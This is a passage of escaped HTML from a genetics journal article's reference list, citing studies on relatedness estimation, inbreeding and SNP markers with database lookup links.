class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1002\/elps.200500671\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=16586411\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000237685600004\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-38-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-38\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.38\u0022 data-doi=\u002210.1111\/j.1365-294X.2010.04554.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESanture\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. W.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EStapley\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EJ.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBall\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA. D.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBirkhead\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ET. R.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBurke\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ET.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-etal\u0022\u003Eet al.\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2010\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EOn the use of large marker panels to estimate inbreeding and relatedness: empirical and simulation studies of a pedigreed zebra finch population typed at 771 SNPs.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E19\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1439\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1451\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMolecular%2BEcology%2B%2528Print%2529%26rft.stitle%253DMolecular%2BEcology%2B%2528Print%2529%26rft.aulast%253DSanture%26rft.auinit1%253DA.%2BW.%26rft.volume%253D19%26rft.issue%253D7%26rft.spage%253D1439%26rft.epage%253D1451%26rft.atitle%253DOn%2Bthe%2Buse%2Bof%2Blarge%2Bmarker%2Bpanels%2Bto%2Bestimate%2Binbreeding%2Band%2Brelatedness%253A%2Bempirical%2Band%2Bsimulation%2Bstudies%2Bof%2Ba%2Bpedigreed%2Bzebra%2Bfinch%2Bpopulation%2Btyped%2Bat%2B771%2BSNPs.%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fj.1365-294X.2010.04554.x%26rft_id%253Dinfo%253Apmid%252F20149098%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/j.1365-294X.2010.04554.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=20149098\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=000275761300016\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-39-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-39\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.39\u0022 data-doi=\u002210.1111\/j.1755-0998.2010.02833.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESkaug\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EH. J.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBerube\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EPalsb\u00f8ll\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EP. J.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2010\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EDetecting dyads of related individuals in large collections of DNA-profiles by controlling the false discovery rate.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EMol. Ecol. Resour.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E10\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E693\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E700\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DMol.%2BEcol.%2BResour.%26rft.volume%253D10%26rft.spage%253D693%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fj.1755-0998.2010.02833.x%26rft_id%253Dinfo%253Apmid%252F21565074%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/j.1755-0998.2010.02833.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=21565074\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-40-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-40\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.40\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESpeed\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EBalding\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED. J.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2015\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003ERelatedness in the post-genomic era: is it still useful?\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003ENat. Rev. Genet.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E16\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E33\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E44\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DNat.%2BRev.%2BGenet.%26rft.volume%253D16%26rft.spage%253D33%26rft_id%253Dinfo%253Apmid%252F25404112%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=25404112\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-41-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-41\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.41\u0022 data-doi=\u002210.1007\/s10592-015-0709-1\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ETaylor\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EH.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EKardos\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ERamstad\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EK.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EAllendorf\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EF.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2015\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EValid estimates of individual inbreeding coefficients from marker-based pedigrees are not feasible in wild populations with low allelic diversity.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EConserv. Genet.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E16\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E901\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E913\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DConserv.%2BGenet.%26rft.volume%253D16%26rft.spage%253D901%26rft_id%253Dinfo%253Adoi%252F10.1007%252Fs10592-015-0709-1%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1007\/s10592-015-0709-1\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-42-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-42\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.42\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EThomas\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ES.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EHill\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EW.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2000\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EEstimating quantitative genetic parameters using sibships reconstructed from marker data.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EGenetics\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E155\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E1961\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E1972\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DGenetics%26rft.stitle%253DGenetics%26rft.aulast%253DThomas%26rft.auinit1%253DS.%2BC.%26rft.volume%253D155%26rft.issue%253D4%26rft.spage%253D1961%26rft.epage%253D1972%26rft.atitle%253DEstimating%2BQuantitative%2BGenetic%2BParameters%2BUsing%2BSibships%2BReconstructed%2BFrom%2BMarker%2BData%26rft_id%253Dinfo%253Apmid%252F10924488%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/ijlink\/YTozOntzOjQ6InBhdGgiO3M6MTQ6Ii9sb29rdXAvaWpsaW5rIjtzOjU6InF1ZXJ5IjthOjQ6e3M6ODoibGlua1R5cGUiO3M6NDoiQUJTVCI7czoxMToiam91cm5hbENvZGUiO3M6ODoiZ2VuZXRpY3MiO3M6NToicmVzaWQiO3M6MTA6IjE1NS80LzE5NjEiO3M6NDoiYXRvbSI7czoxODoiL2dnZy81LzkvMTgxNS5hdG9tIjt9czo4OiJmcmFnbWVudCI7czowOiIiO30=\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-ijlink\u0022\u003E\u003Cspan\u003E\u003Cspan class=\u0022cit-reflinks-abstract\u0022\u003EAbstract\u003C\/span\u003E\u003Cspan class=\u0022cit-sep cit-reflinks-variant-name-sep\u0022\u003E\/\u003C\/span\u003E\u003Cspan class=\u0022cit-reflinks-full-text\u0022\u003E\u003Cspan class=\u0022free-full-text\u0022\u003EFREE \u003C\/span\u003EFull Text\u003C\/span\u003E\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-43-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-43\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-book\u0022 id=\u0022cit-5.9.1815.43\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EThompson\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EE.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E1991\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EEstimation of Relationships from Genetic Data\u003C\/span\u003E, pp. \u003Cspan class=\u0022cit-fpage\u0022\u003E255\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E269\u003C\/span\u003E in \u003Cspan class=\u0022cit-source\u0022\u003EHandbook of Statistics\u003C\/span\u003E, edited by \u003Cspan class=\u0022cit-ed\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ERao\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EC.\u003C\/span\u003E\u003C\/span\u003E, \u003Cspan class=\u0022cit-ed\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EChakrabort\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ER.\u003C\/span\u003E\u003C\/span\u003E. \u003Cspan class=\u0022cit-publ-name\u0022\u003EElsevier Science, Amsterdam\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-44-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-44\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.44\u0022 data-doi=\u002210.1111\/j.1469-1809.1975.tb00120.x\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EThompson\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EE. A.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E1975\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EThe estimation of pairwise relationships.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EAnn. Hum. Genet.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E39\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E173\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E188\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DAnnals%2Bof%2Bhuman%2Bgenetics%26rft.stitle%253DAnn%2BHum%2BGenet%26rft.aulast%253DThompson%26rft.auinit1%253DE.%2BA.%26rft.volume%253D39%26rft.issue%253D2%26rft.spage%253D173%26rft.epage%253D188%26rft.atitle%253DThe%2Bestimation%2Bof%2Bpairwise%2Brelationships.%26rft_id%253Dinfo%253Adoi%252F10.1111%252Fj.1469-1809.1975.tb00120.x%26rft_id%253Dinfo%253Apmid%252F1052764%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1111\/j.1469-1809.1975.tb00120.x\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=1052764\u0026amp;link_type=MED\u0026amp;atom=%2Fggg%2F5%2F9%2F1815.atom\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-medline\u0022\u003E\u003Cspan\u003EPubMed\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=A1975AX72600006\u0026amp;link_type=ISI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-newisilink cit-ref-sprinkles-webofscience\u0022\u003E\u003Cspan\u003EWeb of Science\u003C\/span\u003E\u003C\/a\u003E\u003C\/div\u003E\u003C\/div\u003E\u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022ref-label ref-label-empty\u0022\u003E\u003C\/span\u003E\u003Ca class=\u0022rev-xref-ref\u0022 href=\u0022#xref-ref-45-1\u0022 title=\u0022View reference in text\u0022 id=\u0022ref-45\u0022\u003E\u21b5\u003C\/a\u003E\u003Cdiv class=\u0022cit ref-cit ref-journal\u0022 id=\u0022cit-5.9.1815.45\u0022 data-doi=\u002210.1051\/gse:2002009\u0022\u003E\u003Cdiv class=\u0022cit-metadata\u0022\u003E\u003Col class=\u0022cit-auth-list\u0022\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EVignal\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EMilan\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003ED.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003ESanCristobal\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EM.\u003C\/span\u003E\u003C\/span\u003E, \u003C\/li\u003E\u003Cli\u003E\u003Cspan class=\u0022cit-auth\u0022\u003E\u003Cspan class=\u0022cit-name-surname\u0022\u003EEggen\u003C\/span\u003E \u003Cspan class=\u0022cit-name-given-names\u0022\u003EA.\u003C\/span\u003E\u003C\/span\u003E\u003C\/li\u003E\u003C\/ol\u003E\u003Ccite\u003E, \u003Cspan class=\u0022cit-pub-date\u0022\u003E2002\u003C\/span\u003E\u2003\u003Cspan class=\u0022cit-article-title\u0022\u003EA review on SNP and other types of molecular markers and their use in animal genetics.\u003C\/span\u003E \u003Cabbr class=\u0022cit-jnl-abbrev\u0022\u003EGenet. Sel. Evol.\u003C\/abbr\u003E \u003Cspan class=\u0022cit-vol\u0022\u003E34\u003C\/span\u003E: \u003Cspan class=\u0022cit-fpage\u0022\u003E275\u003C\/span\u003E\u2013\u003Cspan class=\u0022cit-lpage\u0022\u003E305\u003C\/span\u003E.\u003C\/cite\u003E\u003C\/div\u003E\u003Cdiv class=\u0022cit-extra\u0022\u003E\u003Ca href=\u0022{openurl}?query=rft.jtitle%253DGenetics%252C%2Bselection%252C%2Bevolution.%2B%253A%2B%2BGSE%26rft.stitle%253DGenet%2BSel%2BEvol%26rft.aulast%253DVignal%26rft.auinit1%253DA.%26rft.volume%253D34%26rft.issue%253D3%26rft.spage%253D275%26rft.epage%253D305%26rft.atitle%253DA%2Breview%2Bon%2BSNP%2Band%2Bother%2Btypes%2Bof%2Bmolecular%2Bmarkers%2Band%2Btheir%2Buse%2Bin%2Banimal%2Bgenetics.%26rft_id%253Dinfo%253Adoi%252F10.1051%252Fgse%253A2002009%26rft_id%253Dinfo%253Apmid%252F12081799%26rft.genre%253Darticle%26rft_val_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Ajournal%26ctx_ver%253DZ39.88-2004%26url_ver%253DZ39.88-2004%26url_ctx_fmt%253Dinfo%253Aofi%252Ffmt%253Akev%253Amtx%253Actx\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-openurl cit-ref-sprinkles-open-url\u0022\u003E\u003Cspan\u003EOpenUrl\u003C\/span\u003E\u003C\/a\u003E\u003Ca href=\u0022\/lookup\/external-ref?access_num=10.1051\/gse:2002009\u0026amp;link_type=DOI\u0022 class=\u0022cit-ref-sprinkles cit-ref-sprinkles-doi cit-ref-sprinkles-crossref\u0022\u003E\u003Cspan\u003ECrossRef\u003C\/span\u003E\u003C\/a\u003E\u003Ca 